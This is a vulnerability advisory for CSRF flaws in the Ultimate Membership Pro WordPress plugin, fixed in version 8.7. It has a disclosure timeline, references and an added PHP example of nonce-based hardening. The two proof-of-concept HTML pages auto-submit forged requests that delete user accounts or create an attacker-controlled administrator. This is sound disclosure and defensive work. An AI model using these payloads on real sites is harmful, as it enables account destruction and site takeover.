Ultimate Membership Pro < 8.7 - Cross-Site Request Forgery allowing Arbitrary Account Deletion and Creation



Description
While confirming that the issues from https://wpvulndb.com/vulnerabilities/10086 had been remediated, two CSRF issues were identified that allow attackers to make a logged-in administrator delete arbitrary accounts, as well as create a new administrator account. Other CSRF issues may be present but have not been checked.


February 17th, 2020 - Envato Notified
February 22nd, 2020 - New version released (8.7), fixing the reported issues, as well as putting CSRF checks on all other actions as per recommendations.
Proof of Concept
<html>
  <body onload="document.forms[0].submit();">
    <form action="https://example.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST">
      <input type="hidden" name="ihc_limit" value="25" />
      <input type="hidden" name="delete_users[]" value="5" />
      <input type="hidden" name="delete" value="Delete" />
    </form>
  </body>
</html>


<html>
  <!-- Account will not show up in the plugin's users list (because of admin role), but will be in the WP users list -->
  <body onload="document.forms[0].submit();">
    <form action="https://example.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="user_login" value="admin-csrf" />
      <input type="hidden" name="user_email" value="admin-csrf@attacker.com" />
      <input type="hidden" name="first_name" value="Admin" />
      <input type="hidden" name="last_name" value="CSRF" />
      <input type="hidden" name="pass1" value="Passw0rd" />
      <input type="hidden" name="pass2" value="Passw0rd" />
      <input type="hidden" name="role" value="administrator" />
      <input type="hidden" name="ihc_user_levels" value="-1" />
      <input type="hidden" name="ihc_overview_post" value="-1" />
      <input type="hidden" name="Submit" value="Register" />
    </form>
  </body>
</html>
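For comparison with the PoC forms above, the defensive pattern the 8.7 fix is described as applying (CSRF checks on the admin actions), shown for the user-deletion form; the same nonce and capability check applies to the registration form in the second PoC. This is an added example, not the plugin's code: the field names delete_users[] and delete come from the PoC, while the function names, the nonce action string and the admin_init hook are assumptions.

```php
<?php
// Added example (not Ultimate Membership Pro's code): a WordPress admin-page
// handler for the "delete users" form from the PoC, first in the shape the
// PoC exploits, then with the nonce and capability checks that block it.
require_once ABSPATH . 'wp-admin/includes/user.php';   // defines wp_delete_user()

// Render the form: wp_nonce_field() emits a hidden _wpnonce input bound to
// the logged-in user's session, the action string and a short time window,
// so a cross-origin page cannot know the value to put in a forged POST.
function ihc_example_render_delete_form( array $user_ids ) {
    echo '<form method="post">';
    wp_nonce_field( 'ihc_example_delete_users' );      // assumed action name
    foreach ( $user_ids as $id ) {
        printf( '<input type="checkbox" name="delete_users[]" value="%d" />', (int) $id );
    }
    echo '<input type="submit" name="delete" value="Delete" /></form>';
}

// Vulnerable shape: any POST carrying the administrator's session cookie is
// acted on, which is exactly what the auto-submitting PoC form relies on.
function ihc_example_handle_delete_unsafe() {
    if ( empty( $_POST['delete'] ) || empty( $_POST['delete_users'] ) ) {
        return;
    }
    foreach ( (array) $_POST['delete_users'] as $id ) {
        wp_delete_user( (int) $id );
    }
}

// Hardened shape: the request must prove it originated from the plugin's own
// form (valid nonce) and from a user allowed to perform it (capability).
function ihc_example_handle_delete() {
    if ( empty( $_POST['delete'] ) || empty( $_POST['delete_users'] ) ) {
        return;
    }
    // check_admin_referer() calls wp_die() when _wpnonce is missing or
    // invalid, so a forged cross-site POST never reaches the deletion loop.
    check_admin_referer( 'ihc_example_delete_users' );
    if ( ! current_user_can( 'delete_users' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    foreach ( (array) $_POST['delete_users'] as $id ) {
        $id = (int) $id;
        if ( $id !== get_current_user_id() ) {          // never delete the acting admin
            wp_delete_user( $id );
        }
    }
}
add_action( 'admin_init', 'ihc_example_handle_delete' );   // assumed hook
```

A quick check that a fix of this kind is in place: submit the plugin's own form with the _wpnonce field removed or altered and confirm the request is rejected instead of being processed.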

Affects Plugin

Fixed in version 8.7

References

URL https://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
URL https://blog.wpscan.org/wpvulndb/report/2020/03/06/ultimate-membership-pro-recent-vulnerabilities-breakdown.html

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher ErwanLR
Submitter Website https://wpscan.org
Submitter Twitter erwan_lr
Verified Yes
WPVDB ID 10087

Timeline

Publicly Published 2020-02-24
Added 2020-02-24
Last Updated 2020-03-07
